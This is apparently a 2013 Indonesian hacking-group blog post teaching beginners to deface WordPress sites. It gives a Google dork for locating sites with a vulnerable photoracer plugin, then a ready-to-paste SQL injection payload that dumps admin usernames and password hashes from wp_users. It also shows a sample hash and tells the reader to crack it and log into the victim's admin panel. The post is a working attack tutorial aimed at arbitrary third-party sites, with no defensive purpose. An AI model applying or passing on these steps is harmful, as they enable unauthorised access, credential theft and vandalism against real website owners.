X-Code Cyber Team

We love freedom, justice, peace, n' unity! Not Master. Not Newbie. Not Hacker. Not Cracker. We are SAME! We are FAMILY! Expect us -=[./X-Code Cyber Team]=-

» » Cara Deface Dengan Exploit Wordpress For Newbie

Cara Deface Dengan Exploit Wordpress For Newbie


Ya, memang tutorial ini merupakan tutorial lama tapi tidak ada salahnya kan berbagi? Ok simak saja baik - baik.




1. Ketik dork berikut ke kotak pencarian google : inurl:"wp-content/plugins/photoracer/viewimg.php?id="

 2. Nantinya akan muncul beberapa web, buka salah satu untuk di eksekusi.

3. Tambahkan exploit ini di belakang url : +union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users
Contoh : www.site.com/wp-content/plugins/photoracer/viewimg.php?id=1 menjadi
www.site.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users

 4. Nah, nanti bakalan muncul penampakan username dan password dari web tersebut.
Contoh : admin:$P$BfwsoL2ygVgJxpx3lLT9j/0IxRRgDB1

 5. Disitu, bentuk password masih berupa salt/MD5. Silahkan anda crack terlebih dahulu, untuk password yang berupa MD5 bisa di crack disini

6. Jika sudah dapat username dan passwordnya, anda login ke web tersebut melalui www.site.com/wp-admin/
Anda baru saja membaca artikel yang berkategori Defacing dengan judul Cara Deface Dengan Exploit Wordpress For Newbie. Anda bisa bookmark halaman ini dengan URL http://x-cct.blogspot.com/2013/04/cara-deface-dengan-exploit-wordpress.html. Terima kasih!
Ditulis oleh: Kharisma Prams - Monday, April 29, 2013
Comments
0 Comments

Belum ada komentar untuk "Cara Deface Dengan Exploit Wordpress For Newbie"

Post a Comment

Subscribe to: Post Comments (Atom)